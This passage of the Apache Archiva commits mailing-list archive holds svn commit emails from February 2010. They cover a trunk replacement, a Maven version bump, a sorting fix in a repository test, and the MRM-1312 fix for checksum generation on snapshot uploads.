05:36:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Tue Feb 23 05:36:58 2010 New Revision: 915191 URL: http://svn.apache.org/viewvc?rev=915191&view=rev Log: replace trunk Removed: archiva/trunk/ From [email protected] Tue Feb 23 05:37:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34102 invoked from network); 23 Feb 2010 05:37:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2010 05:37:53 -0000 Received: (qmail 93118 invoked by uid 500); 23 Feb 2010 05:37:53 -0000 Delivered-To: [email protected] Received: (qmail 93055 invoked by uid 500); 23 Feb 2010 05:37:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93046 invoked by uid 99); 23 Feb 2010 05:37:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 05:37:53 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 05:37:53 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0B32223889EB; Tue, 23 Feb 2010 05:37:33 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r915192 - in /archiva: branches/MRM-1025/ trunk/ Date: Tue, 23 Feb 2010 05:37:33 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 23 05:37:32 2010 New Revision: 915192 URL: http://svn.apache.org/viewvc?rev=915192&view=rev Log: replace trunk Added: archiva/trunk/ (props changed) - copied from r915191, archiva/branches/MRM-1025/ Removed: archiva/branches/MRM-1025/ Propchange: archiva/trunk/ ------------------------------------------------------------------------------ --- svn:ignore (added) +++ svn:ignore Tue Feb 23 05:37:32 2010 @@ -0,0 +1,9 @@ +target +*.iml +*.ipr +*.iws +.metadata +.settings +.classpath +.project +.pom.xml.swp Propchange: archiva/trunk/ ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Tue Feb 23 05:37:32 2010 @@ -0,0 +1,6 @@ +/archiva/branches/MRM-1025:721945-723577 +/archiva/branches/MRM-541:686983-687034 +/archiva/branches/archiva-search-improvements:723609-726925 +/archiva/branches/archiva-struts2:699795-705848 +/archiva/tags/archiva-1.3:898632 +/archiva/trunk:825850-909464 From [email protected] Tue Feb 23 08:34:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10990 invoked from network); 23 Feb 2010 08:34:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2010 08:34:45 -0000 Received: (qmail 49926 invoked by uid 500); 23 Feb 2010 08:34:45 -0000 Delivered-To: [email protected] Received: (qmail 49860 invoked by uid 500); 23 Feb 2010 08:34:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49851 invoked by uid 99); 23 Feb 2010 08:34:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 08:34:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 08:34:45 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1680923889B9; Tue, 23 Feb 2010 08:34:25 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r915240 - /archiva/trunk/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java Date: Tue, 23 Feb 2010 08:34:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: oching Date: Tue Feb 23 08:34:24 2010 New Revision: 915240 URL: http://svn.apache.org/viewvc?rev=915240&view=rev Log: fixed sorting which is causing the test to fail in some platforms Modified: archiva/trunk/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java Modified: archiva/trunk/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java?rev=915240&r1=915239&r2=915240&view=diff ============================================================================== --- archiva/trunk/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java (original) +++ archiva/trunk/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java Tue Feb 23 08:34:24 2010 @@ -24,6 +24,7 @@ import java.util.Arrays; import java.util.Collection; import java.util.Collections; +import java.util.Comparator; import java.util.Date; import java.util.HashMap; import java.util.HashSet; @@ -531,8 +532,14 @@ artifact2.setProject( "project2" ); repository.updateArtifact( TEST_REPO_ID, TEST_NAMESPACE, "project2", TEST_PROJECT_VERSION, artifact2 ); - assertEquals( Arrays.asList( artifact1, artifact2 ), new ArrayList<ArtifactMetadata>( - repository.getArtifactsByDateRange( TEST_REPO_ID, null, null ) ) ); + List<ArtifactMetadata> expected = Arrays.asList( artifact1, artifact2 ); + Collections.sort( expected, new ArtifactMetadataComparator() ); + + List<ArtifactMetadata> actual = new ArrayList<ArtifactMetadata>( + repository.getArtifactsByDateRange( TEST_REPO_ID, null, null ) ); + Collections.sort( actual, new ArtifactMetadataComparator() ); + + assertEquals( expected, actual ); repository.deleteRepository( TEST_REPO_ID ); @@ -572,6 +579,14 @@ return artifact; } + private class ArtifactMetadataComparator implements Comparator<ArtifactMetadata> + { + public final int compare ( ArtifactMetadata a, ArtifactMetadata b) + { + return ( (String) a.getProject() ).compareTo( (String) b.getProject() ); + } + } + private static class TestMetadataFacet implements MetadataFacet { From [email protected] Tue Feb 23 11:50:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91470 invoked from network); 23 Feb 2010 11:50:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2010 11:50:13 -0000 Received: (qmail 75996 invoked by uid 500); 23 Feb 2010 11:50:13 -0000 Delivered-To: [email protected] Received: (qmail 75937 invoked by uid 500); 23 Feb 2010 11:50:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75928 invoked by uid 99); 23 Feb 2010 11:50:13 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 11:50:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 11:50:13 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1FB8923889EB; Tue, 23 Feb 2010 11:49:53 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r915292 - /archiva/trunk/pom.xml Date: Tue, 23 Feb 2010 11:49:53 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 23 11:49:52 2010 New Revision: 915292 URL: http://svn.apache.org/viewvc?rev=915292&view=rev Log: the Site plugin version we use requires a newer version of Maven Modified: archiva/trunk/pom.xml Modified: archiva/trunk/pom.xml URL: http://svn.apache.org/viewvc/archiva/trunk/pom.xml?rev=915292&r1=915291&r2=915292&view=diff ============================================================================== --- archiva/trunk/pom.xml (original) +++ archiva/trunk/pom.xml Tue Feb 23 11:49:52 2010 @@ -19,7 +19,7 @@ --><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <prerequisites> - <maven>2.0.6</maven> + <maven>2.2.1</maven> </prerequisites> <parent> From [email protected] Wed Feb 24 14:56:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34844 invoked from network); 24 Feb 2010 14:56:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Feb 2010 14:56:40 -0000 Received: (qmail 97260 invoked by uid 500); 24 Feb 2010 14:56:40 -0000 Delivered-To: [email protected] Received: (qmail 97196 invoked by uid 500); 24 Feb 2010 14:56:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97187 invoked by uid 99); 24 Feb 2010 14:56:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Feb 2010 14:56:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Feb 2010 14:56:38 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4BCC623889C5; Wed, 24 Feb 2010 14:56:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r915813 - /archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/ Date: Wed, 24 Feb 2010 14:56:17 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Wed Feb 24 14:56:16 2010 New Revision: 915813 URL: http://svn.apache.org/viewvc?rev=915813&view=rev Log: remove unused directory Removed: archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/ From [email protected] Thu Feb 25 09:32:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40385 invoked from network); 25 Feb 2010 09:32:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Feb 2010 09:32:33 -0000 Received: (qmail 58987 invoked by uid 500); 25 Feb 2010 09:32:33 -0000 Delivered-To: [email protected] Received: (qmail 58923 invoked by uid 500); 25 Feb 2010 09:32:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58915 invoked by uid 99); 25 Feb 2010 09:32:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Feb 2010 09:32:33 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Feb 2010 09:32:32 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A493923889EB; Thu, 25 Feb 2010 09:32:12 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r916197 - in /archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src: main/java/org/apache/maven/archiva/web/action/UploadAction.java test/java/org/apache/maven/archiva/web/action/UploadActionTest.java Date: Thu, 25 Feb 2010 09:32:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: oching Date: Thu Feb 25 09:32:12 2010 New Revision: 916197 URL: http://svn.apache.org/viewvc?rev=916197&view=rev Log: [MRM-1312] mda5 and sha are not generated for snapshot jars submitted by Maria Catherine Tan o use the actual file, which has a timestamp + build number version, when creating a repository task for a snapshot artifact Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java?rev=916197&r1=916196&r2=916197&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java Thu Feb 25 09:32:12 2010 @@ -360,7 +360,7 @@ else { copyFile( artifactFile, targetPath, filename, fixChecksums ); - queueRepositoryTask( repository.getId(), repository.toFile( artifactReference ) ); + queueRepositoryTask( repository.getId(), targetFile ); } } catch ( IOException ie ) Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java?rev=916197&r1=916196&r2=916197&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java Thu Feb 25 09:32:12 2010 @@ -411,13 +411,88 @@ auditLogsDaoControl.verify(); String repoLocation = config.findManagedRepositoryById( REPOSITORY_ID ).getLocation(); - assertEquals( 6, new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/" ).list().length ); + String[] artifactsList = new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/" ).list(); + + assertEquals( 6, artifactsList.length ); assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + MetadataTools.MAVEN_METADATA ).exists() ); assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + MetadataTools.MAVEN_METADATA + ".sha1" ).exists() ); assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + MetadataTools.MAVEN_METADATA + ".md5" ).exists() ); + + int startIndex = "artifact-upload-1.0-".length(); + int endIndex = -1; + + if ( artifactsList[0].contains( "jar" ) ) + { + endIndex = artifactsList[0].indexOf( ".jar" ); + } + else + { + endIndex = artifactsList[0].indexOf( ".pom" ); + } + + String timestamp = artifactsList[0].substring( startIndex, endIndex ); + + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".jar" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".jar.md5" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".jar.sha1" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".pom" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".pom.md5" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".pom.sha1" ).exists() ); + + // verify checksums of jar file + ChecksummedFile checksum = + new ChecksummedFile( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".jar" ) ); + String sha1 = checksum.calculateChecksum( ChecksumAlgorithm.SHA1 ); + String md5 = checksum.calculateChecksum( ChecksumAlgorithm.MD5 ); + + String contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".jar.sha1" ) ); + assertTrue( StringUtils.contains( contents, sha1 ) ); + + contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".jar.md5" ) ); + assertTrue( StringUtils.contains( contents, md5 ) ); + + // verify checksums of pom file + checksum = + new ChecksummedFile( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".pom" ) ); + sha1 = checksum.calculateChecksum( ChecksumAlgorithm.SHA1 ); + md5 = checksum.calculateChecksum( ChecksumAlgorithm.MD5 ); + + contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".pom.sha1" ) ); + assertTrue( StringUtils.contains( contents, sha1 ) ); + + contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + timestamp + ".pom.md5" ) ); + assertTrue( StringUtils.contains( contents, md5 ) ); + + + // verify checksums of metadata file + checksum = + new ChecksummedFile( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + + MetadataTools.MAVEN_METADATA ) ); + sha1 = checksum.calculateChecksum( ChecksumAlgorithm.SHA1 ); + md5 = checksum.calculateChecksum( ChecksumAlgorithm.MD5 ); + + contents = + FileUtils.readFileToString( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + + MetadataTools.MAVEN_METADATA + ".sha1" ) ); + assertTrue( StringUtils.contains( contents, sha1 ) ); + + contents = + FileUtils.readFileToString( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + + MetadataTools.MAVEN_METADATA + ".md5" ) ); + assertTrue( StringUtils.contains( contents, md5 ) ); } public void testChecksumIsCorrectWhenArtifactIsReUploaded() From [email protected] Thu Feb 25 10:14:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62695 invoked from network); 25 Feb 2010 10:14:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Feb 2010 10:14:40 -0000 Received: (qmail 9368 invoked by uid 500); 25 Feb 2010 10:14:40 -0000 Delivered-To: [email protected] Received: (qmail 9336 invoked by uid 500); 25 Feb 2010 10:14:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9329 invoked by uid 99); 25 Feb 2010 10:14:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Feb 2010 10:14:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Feb 2010 10:14:38 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7FEBE23889E2; Thu, 25 Feb 2010 10:14:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r916217 - in /archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src: main/java/org/apache/maven/archiva/web/action/UploadAction.java test/java/org/apache/maven/archiva/web/action/UploadActionTest.java Date: Thu, 25 Feb 2010 10:14:17 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Thu Feb 25 10:14:17 2010 New Revision: 916217 URL: http://svn.apache.org/viewvc?rev=916217&view=rev Log: [MRM-1312] mda5 and sha are not generated for snapshot jars merge from 1.3.x branch -r916197 with a few tweaks in variable name in UploadArtifactTest to resolve conflict Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java?rev=916217&r1=916216&r2=916217&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/UploadAction.java Thu Feb 25 10:14:17 2010 @@ -359,7 +359,7 @@ { copyFile( artifactFile, targetPath, filename, fixChecksums ); triggerAuditEvent( repository.getId(), path + "/" + filename, AuditEvent.UPLOAD_FILE ); - queueRepositoryTask( repository.getId(), repository.toFile( artifactReference ) ); + queueRepositoryTask( repository.getId(), targetFile ); } } catch ( IOException ie ) Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java?rev=916217&r1=916216&r2=916217&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/UploadActionTest.java Thu Feb 25 10:14:17 2010 @@ -526,7 +526,9 @@ control.verify(); String repoLocation = config.findManagedRepositoryById( REPOSITORY_ID ).getLocation(); - assertEquals( 6, new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/" ).list().length ); + String[] artifactsList = new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/" ).list(); + + assertEquals( 6, artifactsList.length ); assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + MetadataTools.MAVEN_METADATA ).exists() ); @@ -534,6 +536,79 @@ ".sha1" ).exists() ); assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + MetadataTools.MAVEN_METADATA + ".md5" ).exists() ); + + int startIndex = "artifact-upload-1.0-".length(); + int endIndex = -1; + + if ( artifactsList[0].contains( "jar" ) ) + { + endIndex = artifactsList[0].indexOf( ".jar" ); + } + else + { + endIndex = artifactsList[0].indexOf( ".pom" ); + } + + String actualTimestamp = artifactsList[0].substring( startIndex, endIndex ); + + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".jar" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".jar.md5" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".jar.sha1" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".pom" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".pom.md5" ).exists() ); + assertTrue( new File( repoLocation, "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".pom.sha1" ).exists() ); + + // verify checksums of jar file + ChecksummedFile checksum = + new ChecksummedFile( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".jar" ) ); + String sha1 = checksum.calculateChecksum( ChecksumAlgorithm.SHA1 ); + String md5 = checksum.calculateChecksum( ChecksumAlgorithm.MD5 ); + + String contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".jar.sha1" ) ); + assertTrue( StringUtils.contains( contents, sha1 ) ); + + contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".jar.md5" ) ); + assertTrue( StringUtils.contains( contents, md5 ) ); + + // verify checksums of pom file + checksum = + new ChecksummedFile( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".pom" ) ); + sha1 = checksum.calculateChecksum( ChecksumAlgorithm.SHA1 ); + md5 = checksum.calculateChecksum( ChecksumAlgorithm.MD5 ); + + contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".pom.sha1" ) ); + assertTrue( StringUtils.contains( contents, sha1 ) ); + + contents = + FileUtils.readFileToString( new File( repoLocation, + "/org/apache/archiva/artifact-upload/1.0-SNAPSHOT/artifact-upload-1.0-" + actualTimestamp + ".pom.md5" ) ); + assertTrue( StringUtils.contains( contents, md5 ) ); + + + // verify checksums of metadata file + checksum = + new ChecksummedFile( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + + MetadataTools.MAVEN_METADATA ) ); + sha1 = checksum.calculateChecksum( ChecksumAlgorithm.SHA1 ); + md5 = checksum.calculateChecksum( ChecksumAlgorithm.MD5 ); + + contents = + FileUtils.readFileToString( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + + MetadataTools.MAVEN_METADATA + ".sha1" ) ); + assertTrue( StringUtils.contains( contents, sha1 ) ); + + contents = + FileUtils.readFileToString( new File( repoLocation, "/org/apache/archiva/artifact-upload/" + + MetadataTools.MAVEN_METADATA + ".md5" ) ); + assertTrue( StringUtils.contains( contents, md5 ) ); } public void testChecksumIsCorrectWhenArtifactIsReUploaded() From [email protected] Thu Feb 25 10:33:03 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70641 invoked from network); 25 Feb 2010 10:33:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Feb 2010 10:33:03 -0000 Received: (qmail 32794 invoked by uid 500); 25 Feb 2010 10:33:03 -0000 Delivered-To: [email protected] Received: (qmail 32764 invoked by uid 500); 25 Feb 2010 10:33:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32757 invoked by uid 99); 25 Feb 2010 10:33:03 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Feb 2010 10:33:03 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Feb 2010 10:33:02 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1D9E023889D7; Thu, 25 Feb 2010 10:32:41 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r916227 - 